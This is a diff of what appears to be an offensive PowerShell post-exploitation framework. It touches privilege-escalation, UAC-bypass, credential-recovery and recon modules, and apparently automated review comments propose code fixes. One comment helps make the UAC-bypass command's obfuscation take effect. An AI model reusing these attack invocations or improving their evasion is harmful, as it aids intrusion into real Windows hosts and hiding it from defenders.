@@ -158,7 +158,7 @@ class Module: except Exception as e: pass if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) scriptEnd = "Invoke-BypassUACTokenManipulation -Arguments \"-w 1 -enc %s\"" % (encodedCradle) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/bypassuac_wscript.py b/lib/modules/powershell/privesc/bypassuac_wscript.py index 122d681..48649b2 100644 --- a/lib/modules/powershell/privesc/bypassuac_wscript.py +++ b/lib/modules/powershell/privesc/bypassuac_wscript.py @@ -112,6 +112,6 @@ class Module: else: scriptEnd = "Invoke-WScriptBypassUAC -payload \"%s\"" % (launcher) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/getsystem.py b/lib/modules/powershell/privesc/getsystem.py index c34f848..c8ebaf9 100644 --- a/lib/modules/powershell/privesc/getsystem.py +++ b/lib/modules/powershell/privesc/getsystem.py @@ -115,6 +115,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" scriptEnd += "'Get-System completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/gpp.py b/lib/modules/powershell/privesc/gpp.py index 8cdf96a..fbb929c 100644 --- a/lib/modules/powershell/privesc/gpp.py +++ b/lib/modules/powershell/privesc/gpp.py 
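Review bot: In bypassuac_tokenmanipulation.py the obfuscation result is thrown away: `scriptEnd = helpers.obfuscate(...)` is immediately followed by `scriptEnd = "Invoke-BypassUACTokenManipulation -Arguments \"-w 1 -enc %s\"" % (encodedCradle)`, so with obfuscate enabled the module still emits the plain invocation and obfuscates whatever scriptEnd held before (not visible in the hunk, possibly unassigned). Move the assignment above the check so it reads `scriptEnd = "Invoke-BypassUACTokenManipulation -Arguments \"-w 1 -enc %s\"" % (encodedCradle)` then `if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)`. The preceding `except Exception as e: pass` also hides whatever failed while building encodedCradle; printing `e` with helpers.color, as the other modules do for read failures, would make a broken cradle diagnosable. The function starts outside the hunk.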
@@ -83,6 +83,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" scriptEnd += "'Get-GPPPassword completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/mcafee_sitelist.py b/lib/modules/powershell/privesc/mcafee_sitelist.py index 33a4a51..dc07331 100644 --- a/lib/modules/powershell/privesc/mcafee_sitelist.py +++ b/lib/modules/powershell/privesc/mcafee_sitelist.py @@ -82,6 +82,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" scriptEnd += "'Get-SiteListPassword completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/ms16-032.py b/lib/modules/powershell/privesc/ms16-032.py index bc740b2..a78fb84 100644 --- a/lib/modules/powershell/privesc/ms16-032.py +++ b/lib/modules/powershell/privesc/ms16-032.py @@ -101,6 +101,6 @@ class Module: scriptEnd = 'Invoke-MS16032 -Command "' + launcherCode + '"' scriptEnd += ';`nInvoke-MS16032 completed.' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/ms16-135.py b/lib/modules/powershell/privesc/ms16-135.py index 5ce5527..7700817 100644 --- a/lib/modules/powershell/privesc/ms16-135.py +++ b/lib/modules/powershell/privesc/ms16-135.py 
@@ -102,5 +102,5 @@ class Module: script += 'Invoke-MS16135 -Command "' + launcherCode + '"' script += ';`nInvoke-MS16135 completed.' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/privesc/powerup/allchecks.py b/lib/modules/powershell/privesc/powerup/allchecks.py index d299c2d..31dd7c4 100644 --- a/lib/modules/powershell/privesc/powerup/allchecks.py +++ b/lib/modules/powershell/privesc/powerup/allchecks.py @@ -85,6 +85,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/find_dllhijack.py b/lib/modules/powershell/privesc/powerup/find_dllhijack.py index 190f421..326d3f2 100644 --- a/lib/modules/powershell/privesc/powerup/find_dllhijack.py +++ b/lib/modules/powershell/privesc/powerup/find_dllhijack.py @@ -100,6 +100,6 @@ class Module: scriptEnd += ' | ft -wrap | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_exe_restore.py b/lib/modules/powershell/privesc/powerup/service_exe_restore.py index 5d3b979..d7c00d9 100644 --- a/lib/modules/powershell/privesc/powerup/service_exe_restore.py +++ b/lib/modules/powershell/privesc/powerup/service_exe_restore.py 
@@ -95,6 +95,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_exe_stager.py b/lib/modules/powershell/privesc/powerup/service_exe_stager.py index c752eee..83da5b2 100644 --- a/lib/modules/powershell/privesc/powerup/service_exe_stager.py +++ b/lib/modules/powershell/privesc/powerup/service_exe_stager.py @@ -128,6 +128,6 @@ class Module: else: scriptEnd += "\nInstall-ServiceBinary -ServiceName \""+str(serviceName)+"\" -Command \"C:\\Windows\\System32\\cmd.exe /C $tempLoc\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_exe_useradd.py b/lib/modules/powershell/privesc/powerup/service_exe_useradd.py index f966dfe..2e2e1fe 100644 --- a/lib/modules/powershell/privesc/powerup/service_exe_useradd.py +++ b/lib/modules/powershell/privesc/powerup/service_exe_useradd.py @@ -106,6 +106,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_stager.py b/lib/modules/powershell/privesc/powerup/service_stager.py index 1585cfd..044fb8f 100644 --- a/lib/modules/powershell/privesc/powerup/service_stager.py 
+++ b/lib/modules/powershell/privesc/powerup/service_stager.py @@ -121,6 +121,6 @@ class Module: scriptEnd += "Invoke-ServiceAbuse -ServiceName \""+serviceName+"\" -Command \"C:\\Windows\\System32\\cmd.exe /C `\"$env:Temp\\debug.bat`\"\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_useradd.py b/lib/modules/powershell/privesc/powerup/service_useradd.py index df9701b..3ed8c4e 100644 --- a/lib/modules/powershell/privesc/powerup/service_useradd.py +++ b/lib/modules/powershell/privesc/powerup/service_useradd.py @@ -104,6 +104,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/write_dllhijacker.py b/lib/modules/powershell/privesc/powerup/write_dllhijacker.py index e77e177..d123d4e 100644 --- a/lib/modules/powershell/privesc/powerup/write_dllhijacker.py +++ b/lib/modules/powershell/privesc/powerup/write_dllhijacker.py @@ -122,6 +122,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/tater.py b/lib/modules/powershell/privesc/tater.py index ff525c9..e46df21 100644 --- a/lib/modules/powershell/privesc/tater.py 
+++ b/lib/modules/powershell/privesc/tater.py @@ -155,6 +155,6 @@ class Module: else: scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/recon/find_fruit.py b/lib/modules/powershell/recon/find_fruit.py index dbca367..65f0b7a 100644 --- a/lib/modules/powershell/recon/find_fruit.py +++ b/lib/modules/powershell/recon/find_fruit.py @@ -127,6 +127,6 @@ class Module: scriptEnd += " | Format-Table -AutoSize | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/recon/get_sql_server_login_default_pw.py b/lib/modules/powershell/recon/get_sql_server_login_default_pw.py index 948c69a..943ed5b 100644 --- a/lib/modules/powershell/recon/get_sql_server_login_default_pw.py +++ b/lib/modules/powershell/recon/get_sql_server_login_default_pw.py @@ -102,6 +102,6 @@ class Module: if instance != "" and not check_all: scriptEnd += " -Instance "+instance if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script \ No newline at end of file diff --git a/lib/modules/powershell/recon/http_login.py b/lib/modules/powershell/recon/http_login.py index b74f5b1..2b39a7d 100644 --- a/lib/modules/powershell/recon/http_login.py +++ b/lib/modules/powershell/recon/http_login.py 
@@ -127,6 +127,6 @@ class Module: scriptEnd += " | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/antivirusproduct.py b/lib/modules/powershell/situational_awareness/host/antivirusproduct.py index 3d58f84..db0f2c8 100644 --- a/lib/modules/powershell/situational_awareness/host/antivirusproduct.py +++ b/lib/modules/powershell/situational_awareness/host/antivirusproduct.py @@ -101,5 +101,5 @@ Get-AntiVirusProduct """ script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(self.info["Name"])+' completed!";' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/host/computerdetails.py b/lib/modules/powershell/situational_awareness/host/computerdetails.py index 1c51f85..808a3ef 100644 --- a/lib/modules/powershell/situational_awareness/host/computerdetails.py +++ b/lib/modules/powershell/situational_awareness/host/computerdetails.py @@ -107,7 +107,7 @@ class Module: scriptEnd += 'Write-Output "Event ID 4624 (Logon):`n";' scriptEnd += "Write-Output $Filtered4624.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script if option == "4648": 
@@ -115,7 +115,7 @@ class Module: scriptEnd += 'Write-Output "Event ID 4648 (Explicit Credential Logon):`n";' scriptEnd += "Write-Output $Filtered4648.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script if option == "AppLocker": @@ -123,7 +123,7 @@ class Module: scriptEnd += 'Write-Output "AppLocker Process Starts:`n";' scriptEnd += "Write-Output $AppLockerLogs.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script if option == "PSLogs": @@ -131,7 +131,7 @@ class Module: scriptEnd += 'Write-Output "PowerShell Script Executions:`n";' scriptEnd += "Write-Output $PSLogs.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script if option == "SavedRDP": 
@@ -139,13 +139,13 @@ class Module: scriptEnd += 'Write-Output "RDP Client Data:`n";' scriptEnd += "Write-Output $RdpClientData.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script # if we get to this point, no switched were specified scriptEnd += "Get-ComputerDetails -Limit " + str(self.options['Limit']['Value']) + " -ToString" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/dnsserver.py b/lib/modules/powershell/situational_awareness/host/dnsserver.py index acdcdae..8c9b0a2 100644 --- a/lib/modules/powershell/situational_awareness/host/dnsserver.py +++ b/lib/modules/powershell/situational_awareness/host/dnsserver.py @@ -101,5 +101,5 @@ function Get-SystemDNSServer else: script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/host/findtrusteddocuments.py b/lib/modules/powershell/situational_awareness/host/findtrusteddocuments.py index 364d877..cb6feda 100644 --- a/lib/modules/powershell/situational_awareness/host/findtrusteddocuments.py +++ b/lib/modules/powershell/situational_awareness/host/findtrusteddocuments.py 
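Review bot: computerdetails.py now carries the same three-line tail (`if obfuscate:` / `scriptEnd = helpers.obfuscate(...)` / `script += scriptEnd` / `return script`) six times, once per option branch plus the default, which is why this signature change had to touch six places in one file. Each branch could just assign scriptEnd and fall through to a single obfuscate-append-return at the end of generate(), so the next helper change is one edit. The context comment `# if we get to this point, no switched were specified` also has a typo; it should read `# if we get to this point, no switches were specified`. The enclosing generate() starts outside this hunk.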
@@ -82,6 +82,6 @@ class Module: script = moduleCode scriptEnd = "Find-TrustedDocuments" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/get_pathacl.py b/lib/modules/powershell/situational_awareness/host/get_pathacl.py index 00ab99a..5511c2b 100644 --- a/lib/modules/powershell/situational_awareness/host/get_pathacl.py +++ b/lib/modules/powershell/situational_awareness/host/get_pathacl.py @@ -87,5 +87,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/host/get_proxy.py b/lib/modules/powershell/situational_awareness/host/get_proxy.py index 71eecb6..fe5997a 100644 --- a/lib/modules/powershell/situational_awareness/host/get_proxy.py +++ b/lib/modules/powershell/situational_awareness/host/get_proxy.py @@ -87,5 +87,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py b/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py index 1939a24..e749366 100644 --- a/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py +++ b/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py 
@@ -116,6 +116,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/paranoia.py b/lib/modules/powershell/situational_awareness/host/paranoia.py index 253971e..4540894 100644 --- a/lib/modules/powershell/situational_awareness/host/paranoia.py +++ b/lib/modules/powershell/situational_awareness/host/paranoia.py @@ -103,6 +103,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/winenum.py b/lib/modules/powershell/situational_awareness/host/winenum.py index fd0583d..f8252c5 100644 --- a/lib/modules/powershell/situational_awareness/host/winenum.py +++ b/lib/modules/powershell/situational_awareness/host/winenum.py @@ -90,6 +90,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/arpscan.py b/lib/modules/powershell/situational_awareness/network/arpscan.py index 387b496..345372f 100644 --- a/lib/modules/powershell/situational_awareness/network/arpscan.py +++ b/lib/modules/powershell/situational_awareness/network/arpscan.py 
@@ -91,6 +91,6 @@ class Module: scriptEnd += " | Select-Object MAC, Address | ft -autosize | Out-String | %{$_ + \"`n\"}" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/bloodhound.py b/lib/modules/powershell/situational_awareness/network/bloodhound.py index d080099..7506a5a 100644 --- a/lib/modules/powershell/situational_awareness/network/bloodhound.py +++ b/lib/modules/powershell/situational_awareness/network/bloodhound.py @@ -159,7 +159,7 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/get_exploitable_system.py b/lib/modules/powershell/situational_awareness/network/get_exploitable_system.py index 4563d5a..99163e9 100644 --- a/lib/modules/powershell/situational_awareness/network/get_exploitable_system.py +++ b/lib/modules/powershell/situational_awareness/network/get_exploitable_system.py @@ -113,5 +113,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/get_spn.py b/lib/modules/powershell/situational_awareness/network/get_spn.py index 9fce9ca..b9c00f4 100644 
--- a/lib/modules/powershell/situational_awareness/network/get_spn.py +++ b/lib/modules/powershell/situational_awareness/network/get_spn.py @@ -93,6 +93,6 @@ class Module: scriptEnd += " -List yes | Format-Table -Wrap | Out-String | %{$_ + \"`n\"}" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py b/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py index dbf5362..8996ab7 100644 --- a/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py +++ b/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py @@ -118,6 +118,6 @@ class Module: if udpTimeOut != "": scriptEnd += " -UDPTimeOut "+udpTimeOut if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py b/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py index 83c9bf9..056ca1c 100644 --- a/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py +++ b/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py @@ -79,6 +79,7 @@ class Module: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" + scriptEnd = "" if check_all: auxModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1" if obfuscate: 
@@ -96,6 +97,7 @@ class Module: if password != "": scriptEnd += " -Password "+password scriptEnd += " | " + scriptEnd += " Get-SQLServerInfo" if username != "": scriptEnd += " -Username "+username @@ -104,6 +106,6 @@ class Module: if instance != "" and not check_all: scriptEnd += " -Instance "+instance if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/portscan.py b/lib/modules/powershell/situational_awareness/network/portscan.py index 336e1bf..88f7617 100644 --- a/lib/modules/powershell/situational_awareness/network/portscan.py +++ b/lib/modules/powershell/situational_awareness/network/portscan.py @@ -142,6 +142,6 @@ class Module: scriptEnd += " | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-String | %{$_ + \"`n\"}" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_computer_field.py b/lib/modules/powershell/situational_awareness/network/powerview/find_computer_field.py index 77f24df..4dcd3b2 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_computer_field.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_computer_field.py 
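Review bot: `scriptEnd += " -Password "+password` (and `" -Username "+username`) in get_sql_server_info.py inserts the credential into the PowerShell pipeline unquoted, so a password containing a space, `$`, `|` or `;` changes the generated command instead of being passed as the argument; the preceding get_sql_server_login_default_pw.py hunk uses the same construction. Wrapping the value in single quotes with embedded quotes doubled, `scriptEnd += " -Password '%s'" % password.replace("'", "''")`, keeps arbitrary passwords as a single argument. The new `scriptEnd += " Get-SQLServerInfo"` after `" | "` is correct only if both lines sit inside the check_all branch, which cannot be confirmed from the hunk; the enclosing generate() starts outside it.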
@@ -103,5 +103,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_group.py b/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_group.py
index 1e81f69..866fb8d 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_group.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_group.py
@@ -97,5 +97,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_user.py b/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_user.py
index 6d7588d..60a1ad1 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_user.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_user.py
@@ -97,5 +97,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_computer_admin.py b/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_computer_admin.py
index ab9a194..fd02dd9 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_computer_admin.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_computer_admin.py
@@ -112,5 +112,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_location.py b/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_location.py
index 2ca9d6f..1d9179a 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_location.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_location.py
@@ -107,5 +107,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py b/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py
index 675c30c..5e8328b 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py
@@ -118,5 +118,5 @@ class Module:
